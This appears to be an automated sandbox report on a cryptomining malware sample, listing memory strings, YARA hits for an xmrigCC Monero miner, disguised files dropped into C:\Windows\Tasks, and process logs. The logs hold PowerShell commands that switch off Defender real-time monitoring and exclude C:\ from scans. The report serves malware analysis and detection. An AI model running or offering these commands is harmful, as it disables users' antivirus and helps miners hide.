00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/
                                  Source: MSTask.exe, 00000038.00000003.1916592166.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151133313.00000268D1D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
                                  Source: MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.co8
                                  Source: Wrap.exeString found in binary or memory: https://github.com/BenDr0id/xmrigCC/
                                  Source: migrate.exe, 0000001A.00000003.1846671612.00000000076C4000.00000004.00000020.00020000.00000000.sdmp, Wrap.exe, 0000002A.00000002.4147802066.00007FF726D2E000.00000002.00000001.01000000.0000000C.sdmp, ApplicationsFrameHost.exe, 00000035.00000000.1907411028.00007FF6A9D02000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://github.com/BenDr0id/xmrigCC/D
                                  Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://github.com/Bendr0id/xmrigCC/blob/master/doc/ALGORITHMS.md)
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                  Source: MSTask.exe, 0000003E.00000002.4148600389.00000268D1100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/497
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                  Source: MSTask.exe, 0000003E.00000002.4151999223.00000268D2110000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                                  Source: MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: MSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
                                  Source: MSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151258677.00000268D1DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
                                  Source: MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
                                  Source: MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                  Source: MSTask.exe, 00000038.00000003.1917495670.00000286A4AD1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917367520.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4153579722.00007FFDFB339000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                  Binary is likely a compiled AutoIt script file
                                  Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e8473442-b
                                  Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_979cdb6e-8
                                  Source: IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_74316cc1-8
                                  Source: IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3c8080b6-e
                                  Source: Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f10eebb4-1
                                  Source: Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f6fc4573-6
                                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Wscript starts Powershell (via cmd or directly)
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00876FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00876FAA
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_00000001400133A0 _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,31_2_00000001400133A0
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\WinRing0x64.sys
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\ApplicationsFrameHost.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\config.json
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\IntelConfigService.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MSTask.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\run.bat
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Superfetch.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\WinRing0x64.sys
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wmiic.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wrap.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MicrosoftPrt.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\1.exe
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_4332265
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\Bridgeprovider.exe
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\fwJLoWFGhpY.bat
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\windows\inf\MicrosoftDefenger.exe
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\windows\inf\7da2ce7d90598e
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCD2E84F4C387140E5AF80638E7ED67168.TMP
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\ProgramData\migrate.exeFile deleted: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087848E0_2_0087848E
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00886CDC0_2_00886CDC
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008840880_2_00884088
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008800B70_2_008800B7
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008740FE0_2_008740FE
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008951C90_2_008951C9
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008871530_2_00887153
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008862CA0_2_008862CA
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008732F70_2_008732F7
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008843BF0_2_008843BF
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087C4260_2_0087C426
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0089D4400_2_0089D440
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087F4610_2_0087F461
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008877EF0_2_008877EF
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0089D8EE0_2_0089D8EE
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087286B0_2_0087286B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087E9B70_2_0087E9B7
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_008A19F40_2_008A19F4
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00883E0B0_2_00883E0B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00894F9A0_2_00894F9A
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087EFE20_2_0087EFE2
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011848E26_2_0011848E
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_00126CDC26_2_00126CDC
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012408826_2_00124088
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001200B726_2_001200B7
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001140FE26_2_001140FE
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012715326_2_00127153
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001351C926_2_001351C9
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001262CA26_2_001262CA
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001132F726_2_001132F7
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001243BF26_2_001243BF
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011C42626_2_0011C426
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0013D44026_2_0013D440
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011F46126_2_0011F461
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001277EF26_2_001277EF
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011286B26_2_0011286B
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0013D8EE26_2_0013D8EE
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011E9B726_2_0011E9B7
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_001419F426_2_001419F4
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_00123E0B26_2_00123E0B
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_00134F9A26_2_00134F9A
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011EFE226_2_0011EFE2
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140020A2C31_2_0000000140020A2C
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000D2D031_2_000000014000D2D0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014002386431_2_0000000140023864
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001047031_2_0000000140010470
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_00000001400070A031_2_00000001400070A0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140019CB431_2_0000000140019CB4
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_00000001400030D031_2_00000001400030D0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000F50031_2_000000014000F500
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140013D1031_2_0000000140013D10
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140005D2031_2_0000000140005D20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000DD4031_2_000000014000DD40
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001255031_2_0000000140012550
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140022D6031_2_0000000140022D60
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001CDD431_2_000000014001CDD4
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140012E0031_2_0000000140012E00
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140008E2031_2_0000000140008E20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000EE5031_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140021B4031_2_0000000140021B40
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140002B5031_2_0000000140002B50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001ABAC31_2_000000014001ABAC
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001DBB831_2_000000014001DBB8
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_00000001400070A037_2_00000001400070A0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140013D1037_2_0000000140013D10
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000DD4037_2_000000014000DD40
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140012E0037_2_0000000140012E00
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014002386437_2_0000000140023864
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001047037_2_0000000140010470
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140019CB437_2_0000000140019CB4
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_00000001400030D037_2_00000001400030D0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000F50037_2_000000014000F500
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140005D2037_2_0000000140005D20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001255037_2_0000000140012550
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140022D6037_2_0000000140022D60
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001CDD437_2_000000014001CDD4
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140008E2037_2_0000000140008E20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140004E2737_2_0000000140004E27
